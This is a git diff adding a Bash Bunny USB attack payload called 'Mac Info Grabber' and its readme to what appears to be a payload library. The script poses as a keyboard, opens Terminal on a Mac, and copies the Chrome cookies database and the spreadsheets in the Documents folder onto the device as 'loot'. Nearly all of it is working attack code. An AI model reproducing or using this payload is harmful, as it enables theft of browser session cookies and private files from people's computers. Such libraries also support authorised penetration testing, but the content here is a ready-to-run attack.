diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt new file mode 100644 index 0000000..cf4461b --- /dev/null +++ b/payloads/library/macinfograbber/payload.txt @@ -0,0 +1,49 @@ +#!/bin/bash +# +# Title: Mac Info Grabber +# Author: kmakblob +# Version: 1.1 +# +# Steaks cookies from chrome and documents from the documents folder (spreadsheets) +# then stashes them in /root/udisk/loot/MacLoot +# +# Red................Failed to get spreadsheets +# Purple.............Got some spreadsheets +# Green..............Finished +# + +LED R +ATTACKMODE HID STORAGE +LOOTDIR=/root/udisk/loot/MacLoot +mkdir -p $LOOTDIR +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 8000 +QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx +QUACK ENTER +QUACK DELAY 500 +QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/ +QUACK ENTER +QUACK DELAY 1000 +QUACK GUI q +QUACK DELAY 500 +QUACK ENTER + +# Green LED for finished +LED G + +files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) +files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) +if [ "$files" != "0" -o "$files2" != "0"] +then +# Got spreadsheet files +LED R B +else +LED R +# No spread sheets +fi diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md new file mode 100644 index 0000000..2222832 --- /dev/null +++ b/payloads/library/macinfograbber/readme.md @@ -0,0 +1,20 @@ +# Mac Info Grabber for the BashBunny + +* Author: kmakblob +* Version: Version 1.0 +* Target: OSX + +## Description + +A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in +the Documents folder and places them inside a folder on the BashBunny called MacLoot. + +This payload can be easily modified to grab other files like word docs or csv files. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Green | Attack Finished | +| Purple | Successfully grabbed xls or xlsx files | +| RED | Did not get any xls or xlsx files |